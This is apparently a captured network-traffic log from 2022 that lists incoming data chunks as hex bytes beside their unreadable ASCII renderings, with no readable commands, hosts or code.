                                                                                                        2022-09-29 12:46:30 UTC12689INData Raw: bc 5b 5c 3a 45 0b 5c 7f ff da 9c 8d ba 27 01 70 3d 20 3f cf 76 d4 2b f5 f9 51 b8 7e f3 78 b0 35 5c 83 32 95 0d 51 19 e3 d3 7f d2 84 aa 35 9c de 07 23 0f 67 ff 37 e6 ad bb af 00 83 d5 52 66 4e e8 56 83 b6 c0 79 ea 1c 0f 7f 49 c4 89 6f 65 bf a9 61 4d 3c af 3a 0d 97 83 4c b0 6e 95 6c 8e 86 a7 3f 00 46 00 b8 c2 ce 04 af b5 8b 35 85 65 5d 48 84 a0 78 29 ce 91 ab 4c dd f6 39 37 4f ff 09 c9 7a 87 0c a8 a6 62 60 8a 6a 5a ba 2b 9a c2 5e 55 b4 03 a7 6b b0 57 67 74 ae 36 69 8c 9b c1 c8 f1 a3 62 ec ef e4 19 17 06 53 b8 a7 54 ce ec f9 38 9d 5f 81 08 e6 41 d0 b7 1e 93 4b ef e7 57 f3 3d 77 be 34 e9 bd e3 e9 df ff f9 d9 ba 58 12 4c 79 56 1b 3e 2a 84 8c 63 d2 ea 3e d8 ad 20 af 54 fe 4c e0 4b 06 09 5e 4e 4e 61 17 11 4b 49 11 5a 8c 85 b6 99 91 48 54 c5 03 c5 93 e0 d5 59 98
                                                                                                        Data Ascii: [\:E\'p= ?v+Q~x5\2Q5#g7RfNVyIoeaM<:Lnl?F5e]Hx)L97Ozb`jZ+^UkWgt6ibST8_AKW=w4XLyV>*c> TLK^NNaKIZHTY
                                                                                                        2022-09-29 12:46:30 UTC12705INData Raw: 2c 0a 29 4b 7d ed c6 28 73 7c b9 e1 02 ab 22 c1 ab 33 4f cd 87 f2 c6 93 85 08 d3 11 51 cf 3f 3d 31 21 16 bd dc 50 94 1f bf 0f 44 ee 27 bd a3 f4 41 cb f2 ee 04 a3 06 c9 80 36 e5 0e ee 6d e6 3f 91 d2 21 32 5b eb 72 b2 31 6a 20 68 70 60 df 6b cf 73 2f 45 2c 0a 26 e0 3b e9 5d 78 ac a3 bf e5 56 cc 2b 4f 66 b9 3d a1 27 11 d8 2e a5 3c 28 06 e5 ef 8f d1 a4 ce 63 42 06 85 fe 19 25 4f 17 df 50 87 eb dc ca b9 45 21 ca 4b d4 64 f8 f0 eb 3c 43 25 f1 c9 06 8e 65 c8 e7 e1 17 82 ff cf 7f d1 83 6d 20 3f 63 3b 74 a7 80 67 ca bf 14 74 ab c1 9a e1 b1 05 b2 6c 12 ca 74 9d 16 98 e2 d7 0e 59 93 aa 32 01 96 b8 a4 8c 09 ef 51 38 5a 2d c1 6a 45 d1 77 ef ab 42 d5 17 50 89 cc df c7 07 ab 40 89 fc 7d d4 e2 fc 02 55 c9 17 92 b4 0e bd ec 87 a1 ea 23 4c 4e 98 6a 76 6c 5f 44 01 f1 a2 13
                                                                                                        Data Ascii: ,)K}(s|"3OQ?=1!PD'A6m?!2[r1j hp`ks/E,&;]xV+Of='.<(cB%OPE!Kd<C%em ?c;tgtltY2Q8Z-jEwBP@}U#LNjvl_D
                                                                                                        2022-09-29 12:46:30 UTC12721INData Raw: 32 e5 a3 e1 5d c2 ea 9a cf 1a 8b 9c 0f b2 fb 94 8c 0b ee 52 64 84 70 6f e5 dc 40 68 19 17 f2 af 2a f0 25 92 32 c6 e1 38 7b 39 de fe 3e 0f c1 88 d0 ed f7 0d 96 53 68 b2 dd 6c 9e 65 0f 7b 93 fd 4e 2e eb 36 2c 40 ee 08 e1 11 5a 2c ee 20 cf 81 a5 b0 e4 83 b0 63 b3 07 ab 44 dd 78 7c ff b5 b4 b8 57 5b e0 06 88 9a 5e 64 cb c9 c0 ed 28 d6 9c 35 e1 7c 6b 67 fb 49 c5 23 c4 f3 e0 d7 30 65 c6 c8 14 b3 51 ee c0 ad 4c 45 2e 0a 1b 58 de cc d9 f3 1d c1 96 4e 30 c8 6e ee 13 61 a3 b9 d5 64 af 5d 0a 5a 59 28 76 dd 2f 98 6f b7 85 dc e5 c5 9b 39 d3 73 d6 d5 cd 66 27 a2 c1 24 39 e7 8d d1 5e 8f b4 c2 d6 e7 7e 24 be 0b 87 81 c1 bf 16 e1 5e 22 62 dc d0 85 9b 6e 00 3c 43 0b a9 3f 8d e6 91 3d d3 89 c6 ab 98 96 de fb ca 9c 15 0b 3a 8c c0 fb 66 0d 2a 63 35 33 8d 41 b8 ce c9 06 9d 26
                                                                                                        Data Ascii: 2]Rdpo@h*%28{9>Shle{N.6,@Z, cDx|W[^d(5|kgI#0eQLE.XN0nad]ZY(v/o9sf'$9^~$^"bn<C?=:f*c53A&
                                                                                                        2022-09-29 12:46:30 UTC12737INData Raw: 03 67 06 65 c6 ed 96 0a 3d fd 25 27 77 3d b7 fd 16 cb 01 fc dc ff 55 75 81 f8 e9 d5 13 de 32 aa 78 77 eb 9a 1c 04 79 c4 81 ff e0 2c 0a c4 44 4b ae cd df 8c 84 f9 fa 6b 96 27 b8 83 6f 31 a1 58 f7 dc b1 f3 0b 0c 83 e8 85 a9 a8 b8 39 bc c5 68 60 af 06 7d a7 b1 73 7c a3 d5 59 68 0c 43 e7 a5 e0 69 eb 62 c4 41 07 86 d2 c2 51 30 56 14 00 6f 37 9e 01 c9 62 a3 89 9b c1 b5 b2 32 03 61 48 a7 65 7c 63 b8 29 70 9a 27 b5 cb b6 1d 63 d8 41 e5 88 e0 e9 70 03 42 0c 33 e2 a2 ef 1e 03 4a 6f 0a 02 f7 eb 14 33 11 e9 ca 54 06 a0 a7 7a b6 91 ea 01 7d 98 3a cd a4 d5 0d a5 aa 21 36 62 bb 91 39 25 23 05 dc 7f 9d 73 75 0f 8d 14 92 1f 8f 4f 8d b2 c5 0e 7a 1f bd f7 90 1e a9 32 a4 ab 95 1b e5 5b 94 60 79 e1 68 a6 00 db 42 9b b5 a8 60 a0 3c 61 5f dc ce 4d 87 52 b9 59 79 bb 4d dc c4 36
                                                                                                        Data Ascii: ge=%'w=Uu2xwy,DKk'o1X9h`}s|YhCibAQ0Vo7b2aHe|c)p'cApB3Jo3Tz}:!6b9%#suOz2[`yhB`<a_MRYyM6
                                                                                                        2022-09-29 12:46:30 UTC12753INData Raw: 23 94 9d 16 16 93 c6 8f 49 ca 49 24 25 87 79 94 8b 97 b4 94 9e 4c 36 49 07 8b 74 19 15 c3 6b c1 ee 8d de 2e 19 cc db bf fc af ae b7 1d e7 c7 47 59 99 12 8f ff 12 45 d6 4c 13 77 4a 27 a8 0c 0f df c5 17 2d 8d 6b ec 8d 9c bb 60 17 a3 5d ef 8c 94 1a d7 45 2d 2a 52 a7 3e 78 0b 92 c1 02 e1 13 5b ec ac fa 75 ae 30 b5 d0 77 b9 35 15 b6 9b cb 75 d3 80 d1 a1 aa f8 e7 b6 53 2b 3b a5 04 3f ec 04 de 1d 78 56 36 91 b2 d8 bc 0e 0f 31 6d 38 9e 00 92 a6 ad 6d 21 fa 2e fe 92 93 96 60 31 29 f2 32 a4 17 58 e3 d8 ee 33 db c9 8f fe 11 09 03 2f c1 e8 1e 76 8c c9 93 e7 e0 24 f7 36 f5 93 bb 8d 98 c4 44 47 19 92 ea 71 2e 42 68 92 26 55 d8 44 4f 00 f6 d1 bd 64 45 f6 8b d3 74 b0 b4 de 8d b5 24 41 16 c3 13 9d 1f 22 0d 39 8c 9d 57 59 68 3a cc f7 db 5d 53 a1 ee 19 0a 7e 74 f1 d6 a7 48
                                                                                                        Data Ascii: #II$%yL6Itk.GYELwJ'-k`]E-*R>x[u0w5uS+;?xV61m8m!.`1)2X3/v$6DGq.Bh&UDOdEt$A"9WYh:]S~tH
                                                                                                        2022-09-29 12:46:30 UTC12769INData Raw: 88 84 4c 9f 40 6f 4b 95 0d 23 be 89 fd 7c e5 a9 bb 8e 1d 37 24 0b aa 3d 3e 9f 86 65 e4 d6 21 d8 51 9d 8c 70 be c3 77 51 f8 dd 60 c0 c0 37 c8 5d fe 1e 0c ee a0 0e 4a 71 cb 8d f1 b7 9c 66 7a 28 ef 57 f0 8d 35 bd 3b 57 44 de b7 c2 a7 f6 fc 85 9b b0 8c 1d 65 d3 ea e6 f1 94 c9 40 f2 f3 12 6d b0 71 72 a8 7f 2d 5f f6 80 87 dd ef ae e4 ec 07 d5 d6 ed 72 a2 3a c8 a9 8b 2e ce df 06 e4 20 ba aa 16 33 a3 e6 26 39 b7 be 8c a7 db 00 a6 68 86 66 0a 50 f4 f8 f4 a9 eb 00 8a c8 9a ff 8d a0 d1 01 61 b9 16 18 e3 54 d1 ad 8e 25 23 66 31 ea af e8 37 85 f2 78 5a d4 d9 8a 9c 2c 4c ff 79 bf dd a2 83 c6 90 e2 0e e9 7e 17 cd 34 66 84 ec 95 ea 5b 25 57 42 48 6c 44 4c c4 e3 b3 97 01 4c 98 0e 7a 95 d1 73 71 0c 1c 99 c8 dd 38 30 c6 21 8a 61 33 f8 1e a5 6b 8b e2 71 a9 3e ca 03 64 96 4b
                                                                                                        Data Ascii: L@oK#|7$=>e!QpwQ`7]Jqfz(W5;WDe@mqr-_r:. 3&9hfPaT%#f17xZ,Ly~4f[%WBHlDLLzsq80!a3kq>dK
                                                                                                        2022-09-29 12:46:30 UTC12780INData Raw: 07 81 cc a0 b2 46 6c e6 e8 01 20 ce a0 30 22 cf 72 77 b6 71 8a 78 62 a5 9f 77 94 a1 a2 c6 b0 93 35 3f f4 de b4 d0 cc 9f c5 83 c7 79 54 40 9a c5 47 d6 ec 65 81 2a f9 c4 1d 24 bf d2 8b 0c e8 6d 17 48 e7 1f 02 a1 63 bb 45 f0 c0 44 79 0b 52 7e be 55 72 7d ec 73 7b 34 50 c2 d1 b7 09 93 97 3b a9 78 96 fa c0 a3 64 e6 13 a0 44 c3 b2 d1 b0 41 ac f1 ac f3 c0 1e 10 df 5b 0a 8b dd 78 85 be 92 39 f9 6b e5 b3 e5 16 4d ae 5c b4 48 ae a9 c1 24 12 77 e9 28 05 02 50 d9 aa 93 43 9e 72 d0 f5 1c db a8 59 52 da e3 6e ad c4 32 c0 aa db 1c 14 eb 98 11 b0 84 40 53 dc 19 d6 d7 0d a0 f4 ad cc d0 78 d5 a0 ec a1 ee 43 2d 53 c5 b0 26 e0 1b 81 cb b6 b8 bc 79 1d fd 39 aa 54 2a 83 7b 11 b9 d7 1a 1a ae 60 96 9f c3 28 55 2b 84 22 c5 bc 19 3f a1 5b 5f 08 b0 a7 37 ca 74 ab 68 53 e9 78 14 a2
                                                                                                        Data Ascii: Fl 0"rwqxbw5?yT@Ge*$mHcEDyR~Ur}s{4P;xdDA[x9kM\H$w(PCrYRn2@SxC-S&y9T*{`(U+"?[_7thSx
                                                                                                        2022-09-29 12:46:30 UTC12796INData Raw: cd 7e 6f e4 e5 28 5a 5a c4 7e 1a 9c 3a 97 e4 35 f2 a7 e6 ed cb 55 a8 fa fd c0 7c 40 e9 c6 d5 f9 e4 fa 70 35 ee 4b 12 36 93 03 e3 ec 4f e4 00 d0 40 7b f4 c7 71 ad 50 19 c1 f1 7d 2b f4 6d df 3f 7a f0 aa 5c f4 6e 62 3b 73 67 24 50 89 c6 08 a3 b4 21 6a e9 37 a6 43 f1 26 71 33 c0 99 1c b4 9e e9 44 77 5c 1f cd 3d 47 f9 d0 91 03 08 54 03 0b e8 4f f4 7a 57 9a 53 d1 40 3f 2d c5 0a 8a 35 86 d5 52 a7 cb 8f 49 8b f1 fa d9 24 51 10 4b e5 a7 23 41 57 1c 49 e1 91 b6 2f 47 a7 7a 08 6a 3c fd 09 e7 05 ca 00 c8 f3 58 1c 27 b5 14 bf 8d ba 4a ca 20 7b 1b 4b ae 66 c6 21 a7 a1 85 55 4f c3 a2 19 e3 67 eb c2 39 ef 6a a4 57 a8 da 59 cf 9d 72 e0 4b 3d 48 63 42 dd 24 41 47 ca f3 c9 e3 ee 44 c1 03 83 84 4e ec 49 51 6a ff e5 21 bc 90 29 a4 e0 86 47 c6 fe 77 39 67 2c ee 32 38 84 a6 1e
                                                                                                        Data Ascii: ~o(ZZ~:5U|@p5K6O@{qP}+m?z\nb;sg$P!j7C&q3Dw\=GTOzWS@?-5RI$QK#AWI/Gzj<X'J {Kf!UOg9jWYrK=HcB$AGDNIQj!)Gw9g,28
                                                                                                        2022-09-29 12:46:30 UTC12812INData Raw: 7c 12 64 26 28 64 b5 d7 be 53 7c bd 10 56 48 74 a0 a6 09 47 ea 8d 4c 8b cc 8a 4d aa 6c b7 f2 03 aa 0a ac 22 92 d7 63 1f 10 2e c8 11 de 90 bd f4 a5 a8 64 0a ee d0 39 e7 49 de a9 9a 86 7d bb a0 5d 1f c0 19 8b 28 b7 2f f2 7b e3 7d 57 3a 4c 65 fe 21 d3 c1 8d f0 49 a5 26 d3 7c 4b 1c fc d9 8b ea 40 30 26 57 ee c5 f7 12 b5 63 cb 77 a0 2b c6 6f b6 5f 5a 8e 07 1c 11 94 de 2e 1e 76 aa d3 6d 71 82 63 db d9 e5 b9 b1 0d 79 61 0c 2a b3 17 a4 32 51 aa bc d5 3f f0 d2 42 16 b5 82 68 7f dd 28 ba 29 d2 39 29 f7 36 64 47 bb 38 10 61 a7 c6 2f ab 3c 2e 04 9b 25 03 28 e2 4a fe cf 50 71 47 0d d4 06 2a 8b c6 92 ba b2 ea 6e a5 b5 82 3b 0b 3c ad 90 38 94 57 2e e8 d2 87 47 fd 22 5d c4 98 ba 80 6e 7c 9c 22 27 5b b3 fa a5 49 03 d7 4a 57 c8 bd 91 49 ae 6c b5 cf 58 67 1c 59 bd 0e 32 19
                                                                                                        Data Ascii: |d&(dS|VHtGLMl"c.d9I}](/{}W:Le!I&|K@0&Wcw+o_Z.vmqcya*2Q?Bh()9)6dG8a/<.%(JPqG*n;<8W.G"]n|"'[IJWIlXgY2
                                                                                                        2022-09-29 12:46:30 UTC12828INData Raw: d3 37 92 e6 b7 62 8a fa d3 f0 aa 00 68 aa 9a 56 b3 e5 15 6d 72 d8 b9 f1 29 be 53 85 8a f6 04 59 7f 4f 91 16 1b c4 fd b0 16 69 fe da b5 7e 52 a1 81 b2 a4 c6 a3 62 1a ab 78 9f 77 a9 3e 7a d1 ef 42 41 7d 1c c8 31 88 21 9e 18 3e d3 65 f8 fd 7a fb 73 02 f8 16 c1 66 10 a4 91 98 3f 66 ee a2 2a cc 4d 84 a9 d3 16 2d 89 79 02 03 49 71 2b b7 ff 95 90 9f e2 65 39 33 f2 28 8a b5 a5 15 67 54 aa d6 8d 85 74 2f e9 43 b1 7c 52 9e e2 e7 f3 f1 f5 81 50 f7 c0 c9 07 de c7 4e 17 67 1c 4d 02 8f af 9f 68 23 df 43 be fa 17 6b bb be 72 73 68 64 ed aa 70 f2 17 82 e9 9f 0e e9 b9 f9 69 7c 57 fd 29 01 85 7b 67 c6 3e 5d a6 05 35 91 5a 6a 2f 1d 97 5f 04 b2 b1 d7 d4 1a 01 64 c9 4f 88 d3 c9 e7 a1 9d 1f 0d 8c 3c f6 d6 cf bc fd d2 bd 24 5e 98 75 31 09 95 01 f1 73 f2 e8 d8 06 d9 d5 a0 b6 0b
                                                                                                        Data Ascii: 7bhVmr)SYOi~Rbxw>zBA}1!>ezsf?f*M-yIq+e93(gTt/C|RPNgMh#Ckrshdpi|W){g>]5Zj/_dO<$^u1s
                                                                                                        2022-09-29 12:46:30 UTC12844INData Raw: d5 f6 bf d9 81 ee 2f bb 5b 9c 25 d9 f5 23 69 f1 c5 33 bc 6b a1 85 6c a9 67 48 41 c0 30 27 b8 cb 9c f5 49 20 2a ae 37 56 d7 d4 73 e6 d4 23 1d aa ac 64 8c 34 a6 36 1b 54 b5 da ad 40 d0 da 18 bd 14 51 0c 58 1e e5 34 fd 1f f7 c1 77 84 21 05 3c 1f d7 fe a0 92 d8 59 d4 17 8d fa ce 90 ab ce 68 0f b0 f0 16 c7 45 f5 7d 69 ba 7e 8f 54 19 46 2d d9 46 9e 99 dc 34 3c dd 98 9c 18 44 52 91 53 d9 5b 26 d9 7c 2e 7b f3 21 f3 07 18 40 75 06 fc af f8 77 89 e6 c2 b5 09 b6 ac 46 32 9c 30 3a 8b 56 de eb 6b 30 82 c5 12 e5 71 31 1e 3b 40 c5 77 0f 68 27 aa be 73 2b c6 65 3e 1b a6 9e 65 15 f9 b8 9b 18 bd 9f b3 fd 90 b4 ac ba d4 cb 59 05 3f bc f4 85 18 19 05 d7 2d d1 c8 d9 4a 50 fe 47 b8 c2 b4 47 a7 d7 83 97 d0 9d 4a 4d 68 a1 fb fb b1 09 64 20 26 fa a5 6d 74 f7 ef 1d 1d c6 14 5f 18
                                                                                                        Data Ascii: /[%#i3klgHA0'I *7Vs#d46T@QX4w!<YhE}i~TF-F4<DRS[&|.{!@uwF20:Vk0q1;@wh's+e>eY?-JPGGJMhd &mt_
                                                                                                        2022-09-29 12:46:30 UTC12860INData Raw: 73 c7 45 4b e5 44 aa 1f a2 5b ff c3 4d e3 fa eb 32 3f bf 76 31 c1 5b 15 79 2e ea b1 89 7f 15 03 a9 60 e7 81 15 8c cd 36 39 8d f3 17 91 d3 0e 0a 53 c2 5e 73 c1 10 8d 3f 2f 81 76 53 e5 f1 c0 1f d6 c3 2e 67 e1 19 03 63 5d b2 f8 23 22 55 f7 d3 7a ac 18 19 f5 5c b9 2c 2a 3d 09 d1 a9 72 09 a6 e7 4a ae 89 bd 08 41 b2 b5 81 44 03 0c 98 0e 6f 49 96 ce ce 0c b4 b6 de 50 72 8d b9 5c 3b 0d df 7d df 6c cd 39 43 f3 5b a5 8b e2 8e 30 6c 10 1e 0a b0 80 18 2b e0 a8 56 fa 96 cc 5d 31 14 5b 49 1e 06 37 47 d3 bd 71 03 f5 49 e1 62 a2 3e e2 7d 9e 23 fd 2f bd 4f 2c b2 7a 45 dd f6 cb 02 57 ca 4a 16 73 46 46 0b ba 54 dd c1 08 e2 d6 e3 b3 aa 4b 35 a7 8d bb dd b9 0d b3 a5 95 d2 d4 1f 54 85 bf 8d 19 bc 0f 32 40 55 3a 4b 3d 93 13 3e 05 b3 7d c5 64 22 14 76 d4 3d 1e 6c b6 d8 f9 99 55
                                                                                                        Data Ascii: sEKD[M2?v1[y.`69S^s?/vS.gc]#"Uz\,*=rJADoIPr\;}l9C[0l+V]1[I7GqIb>}#/O,zEWJsFFTK5T2@U:K=>}d"v=lU
                                                                                                        2022-09-29 12:46:30 UTC12876INData Raw: 57 3f 79 40 ca 5d 72 ed ec 24 4b bc ee 51 32 61 57 a8 bf 57 3d f0 b5 16 b1 70 e3 7c 40 1e 9d b5 af 92 9a 09 51 a5 e5 8f 75 89 0f db 1d 1b b1 59 f3 b5 f7 aa de f8 dc f6 c4 60 f9 e8 19 26 61 5c 4c 7a af 7a f4 db 1e 94 ba 62 31 6b 80 6f e3 f3 f7 08 b5 c9 9e 5a c0 52 bd dc df c2 eb 84 34 cb 18 0b 23 ad 04 8c 4c 48 fa a6 6b 60 67 aa 49 fd 46 6e 3d 98 c6 e6 d1 1f d7 32 f3 51 2e 80 6f b4 5d 98 6e 0e 38 9f 94 98 bb 17 60 1f 62 c3 ed 64 cd bf 0f 8e 78 33 2a 54 4e e6 c0 c3 9a af 31 0d ed b7 8a 76 d0 ec ae 67 8b 55 22 1f 98 40 0d a7 c8 6b c4 cf b5 3b 97 dc d2 c0 68 2f 6b 42 66 9b 46 31 c0 f5 a4 7e 00 f7 e1 48 27 37 99 86 c4 06 cd 36 c1 49 98 8f 59 5b 24 7c c4 50 8a 27 3c 8b b7 a1 9f ef 3a 11 5c 4c 28 68 24 84 ee fd 55 69 9d 18 7e 05 17 88 2e 5c a8 32 5f eb c2 1b 84
                                                                                                        Data Ascii: W?y@]r$KQ2aWW=p|@QuY`&a\Lzzb1koZR4#LHk`gIFn=2Q.o]n8`bdx3*TN1vgU"@k;h/kBfF1~H'76IY[$|P'<:\L(h$Ui~.\2_
                                                                                                        2022-09-29 12:46:30 UTC12892INData Raw: 42 ce a8 ff bb 23 73 3c f8 cd 1a 74 45 08 c8 c4 72 94 fb 20 ba 28 b0 ee d7 f8 cf 91 d2 e5 62 f1 dd 25 00 fe 3b 33 50 44 5a a1 88 f5 0c e2 ce 35 e7 d9 0b a3 3b 63 ea 4c f2 a3 1f ca 19 21 4b fb 26 19 9b c0 7c 4e 97 ae ef 9f c3 4b 1f 96 ad c9 c9 3c 8b 95 24 38 a8 c4 e2 56 8f 3f 6b 88 7b 3d d8 3b 93 ba ff 47 ab c3 d9 cc 93 aa a4 32 4b 7f 70 8a 7e 17 fd c1 ed bf b5 2c f0 32 ee 97 86 c0 65 01 be 34 b6 d5 f0 50 2a 8c 15 76 6a 31 09 12 ef 61 ea 14 56 75 b7 5f fa 31 ae 64 60 9d a1 3e a0 8f f7 9c 5e 13 e7 3f 73 01 9b a5 46 25 09 5c 0c 6b a8 ad 4e f2 6c d3 a7 e6 bb 85 64 8f 75 93 19 9d 4f dd c4 0c d3 04 7c 27 6d 45 b0 eb 59 96 91 f6 ec b6 22 98 87 0e 22 61 d5 9e 17 ad 5e 2a 29 1a 95 43 6f be e0 2c ed 97 9e bc 7d ca fb aa cd bf b9 8d 35 4c 8c 4b 64 4e fd 00 6f 4c 0a
                                                                                                        Data Ascii: B#s<tEr (b%;3PDZ5;cL!K&|NK<$8V?k{=;G2Kp~,2e4P*vj1aVu_1d`>^?sF%\kNlduO|'mEY""a^*)Co,}5LKdNoL
                                                                                                        2022-09-29 12:46:30 UTC12908INData Raw: 71 1c 6c cb 41 11 db 1a e6 99 2c b0 ed 93 90 3a 99 c5 ca ef 71 23 18 3d b7 ed 5a b7 a5 6d ca e9 0a fe a1 95 5a 11 32 16 d3 c4 d3 62 9a b0 df 80 b8 70 ed eb 7b 9e a3 61 f0 5d b1 04 f8 f8 f8 0e 03 24 d7 4f 03 22 65 09 fd 9f f0 ce 22 01 dd 89 a9 d1 ca 14 7c 2b fd 57 f9 88 55 b3 5f b5 79 d6 f3 cb 3a 50 36 ca 3a 0d 69 b4 08 89 32 35 17 34 8b b4 3a 07 f0 21 c4 b6 2f 02 d8 4a 09 c8 07 62 c5 53 92 17 16 9b d5 ef a9 59 50 b9 eb 50 f9 11 fe d2 52 d1 24 d8 ef 7d c7 ed 2b 0d 5f 35 a0 0a 68 c1 c1 35 ef 59 ea 5e bf 9e 1b a5 b9 a6 7a de 72 55 6e c4 ee b7 aa 48 fc f0 71 7c 2a 40 ef 0e b7 06 e3 08 ee b9 81 72 41 b4 5b a8 7d 8a 76 16 f9 93 ed 18 f1 ed 21 a3 24 a9 fd fc 44 ff ab 3f b5 b6 71 4c e2 08 34 00 bf b0 f7 ad 91 5b 53 4c 54 79 a2 55 dc da 99 4a 23 40 bd 29 85 42 26
                                                                                                        Data Ascii: qlA,:q#=ZmZ2bp{a]$O"e"|+WU_y:P6:i254:!/JbSYPPR$}+_5h5Y^zrUnHq|*@rA[}v!$D?qL4[SLTyUJ#@)B&
                                                                                                        2022-09-29 12:46:30 UTC12924INData Raw: 54 5c 4b 45 14 d6 20 28 86 6f 09 3e 15 f6 3e 86 d7 79 7d 05 0f a2 71 24 12 de e5 3b c6 54 a8 fe c4 6b 36 e6 2f 7e b0 5d 4f f8 7f b2 3a 87 e7 42 4e 37 74 e0 d9 3f 4a 04 e6 de 6d 7c a0 64 e6 e7 62 80 e6 86 1f 03 1d 06 c7 96 92 a4 7c fd 1f ad f7 4b db 12 52 37 aa d1 f9 56 d6 81 7d 49 dc 58 57 da 08 a0 b5 c5 71 65 2e e6 0d 2f fb c6 7a 8b b3 3a 92 d0 5e 99 1d cc ea 8a 3b 51 4c 48 13 a9 e1 34 be a8 2e a8 d6 bf 59 31 f4 ad e1 28 ec 2d 44 24 21 64 25 95 cc 82 a9 05 f4 dc eb cb b8 8e ce fd 21 54 03 75 d9 96 f6 85 64 ca d6 29 d5 da b2 61 90 68 a2 30 41 a8 83 81 19 df 84 91 5d 6a 98 37 ba 12 a1 ac 65 2f 9a 1d 28 41 66 c6 8c b6 2d 38 9b d7 16 d7 37 e6 34 fe 3e 7c 21 15 b5 ee 37 8a 7c 7b eb 63 83 c3 6b a8 73 97 68 2a e6 14 43 3c fe 58 1d 23 2f 9c a1 bd c0 ce ad 8e 75
                                                                                                        Data Ascii: T\KE (o>>y}q$;Tk6/~]O:BN7t?Jm|db|KR7V}IXWqe./z:^;QLH4.Y1(-D$!d%!Tud)ah0A]j7e/(Af-874>|!7|{cksh*C<X#/u
                                                                                                        2022-09-29 12:46:30 UTC12940INData Raw: 2a 86 4a 28 7e 64 d6 10 62 1d 85 dd ec d8 8e 36 3a 41 c9 75 7b 5e 37 67 8b 38 d0 f2 50 1b ed ee f0 66 b7 70 a7 9d f7 bd a4 c6 12 87 e6 7f f1 f9 5c 56 dd 68 5b 9f 22 d3 eb 26 ca 3a e4 83 5a 42 77 54 fa c8 0b 57 ca 48 4e a1 e1 12 88 a2 90 b1 d7 06 66 2f 4b c9 71 ca 75 17 76 e3 03 91 8a 93 f0 71 eb 39 39 bf ec e5 db 6a 39 f3 46 33 1e a2 15 86 e0 85 32 ea 7e ec c7 99 3b 84 71 7b 5d 36 7e c5 97 dd 69 fb 12 59 0c e8 1b 8f e1 e7 99 e1 15 22 dd a9 8b e0 12 54 6a 25 e7 c6 69 3e a2 8b 42 65 ee 4d 8d d3 95 5c 2f 5e 1a 85 11 f6 3c d2 9b 30 30 5d ce bb ef 36 69 33 d1 2c 0b 4e 08 1c f7 92 cd 01 90 0d 1f 3a 37 1f 53 c2 7c 55 cb fe 99 10 0c 40 54 7e 4b 03 a8 75 b9 c0 36 8d e7 b1 6e b8 b6 91 8c 2f be 30 97 db 7d d1 55 a4 65 65 1a b4 6d 73 2b b2 de 3b 10 d0 98 cd ff c1 e0
                                                                                                        Data Ascii: *J(~db6:Au{^7g8Pfp\Vh["&:ZBwTWHNf/Kquvq99j9F32~;q{]6~iY"Tj%i>BeM\/^<00]6i3,N:7S|U@T~Ku6n/0}Ueems+;
                                                                                                        2022-09-29 12:46:30 UTC12956INData Raw: ff a9 fb 26 f9 a1 05 e4 0a 12 9b 70 fb 26 f5 22 e7 da 2e d7 7f 66 36 6a 03 58 0a 44 b1 a6 5a af c2 5c 4f c9 f7 24 a2 ae c7 e4 15 d1 2d 23 0b a3 90 8f d5 db 30 e5 33 3e 35 7d 6d 8f a8 c1 12 4e 9b ad a9 e1 0d 6f 4e 7f 70 5c c9 43 f2 3d 43 07 e0 e9 48 52 97 3a cf c5 3f c4 bc d5 f4 a4 f3 e6 8c a2 e0 11 59 af b0 bf 66 08 96 e0 97 ce 7d 54 86 6f 75 4a 45 b3 4f ed db 70 f8 7e 8e 5f 9b 2f a8 c7 9b 98 43 a9 5b d7 5e c3 04 f6 8f 82 44 68 fa f3 bd 45 b7 94 29 43 d3 f3 a3 e9 19 18 1f 7f 2c dd 27 69 ef 7e 4a 1d ce 5c 5e 80 0b d3 31 b2 d2 aa 93 51 24 fa af 41 a0 82 69 48 64 14 ac 7c 4b 41 8f a1 08 c9 b4 f8 78 ee eb a0 d8 0f a2 14 72 55 5c 6c 62 3e d4 3a fd 9e 3f 33 9b b4 fc ef e1 d5 78 c9 a4 41 41 71 5e f5 fc d1 1a fc d6 5e 17 38 1b a3 b7 22 03 c8 c7 b5 db 56 c4 ee ca
                                                                                                        Data Ascii: &p&".f6jXDZ\O$-#03>5}mNoNp\C=CHR:?Yf}TouJEOp~_/C[^DhE)C,'i~J\^1Q$AiHd|KAxrU\lb>:?3xAAq^^8"V
                                                                                                        2022-09-29 12:46:30 UTC12972INData Raw: d9 9d 45 b6 2b 90 7f 0b 4e 09 95 6f 4e 05 3a fa 96 4b 94 ab f7 75 ac a4 ec ca b6 cf 0d 97 0e bd ab 96 56 53 d3 be 27 aa 48 12 62 68 ad ac 6f 10 96 a7 5d 53 ae 19 2a 4f 2c 63 eb 8a 52 0b 7b 9a 6d a4 b7 f2 a6 c2 31 4b 6b bd 72 ce f1 3b 29 20 cc b2 18 0c 0f d3 37 99 50 48 4d 4b f9 94 85 0b 08 81 d3 c5 b9 cb 06 51 44 fe a5 43 e6 7f a5 e1 76 93 25 17 c7 67 5f 20 ad b2 68 27 d1 f1 90 0d 64 85 37 0f 42 62 ed 6e 22 69 22 75 fe 20 7d 8c 26 ce 7a 23 80 c4 f7 33 81 eb 58 23 f1 e1 84 b5 84 e1 1f 4a ff 72 97 ef b3 37 32 b5 0d 58 03 ec db 71 97 68 1a ea b5 b2 81 1e 2a 4c 9b b4 e3 20 00 d1 23 30 95 5f 4d 2f 3b 1e 02 e3 8f 25 cf aa 49 e3 ba 6e 51 a3 2a 8e be 92 58 b9 cf e0 71 8c ae dc 7f b7 91 22 e8 21 c0 86 30 a5 ed 5d 73 fa 47 04 2e 32 b9 df 36 89 49 bd af 12 39 6c 02
                                                                                                        Data Ascii: E+NoN:KuVS'Hbho]S*O,cR{m1Kkr;) 7PHMKQDCv%g_ h'd7Bbn"i"u }&z#3X#Jr72Xqh*L #0_M/;%InQ*Xq"!0]sG.26I9l
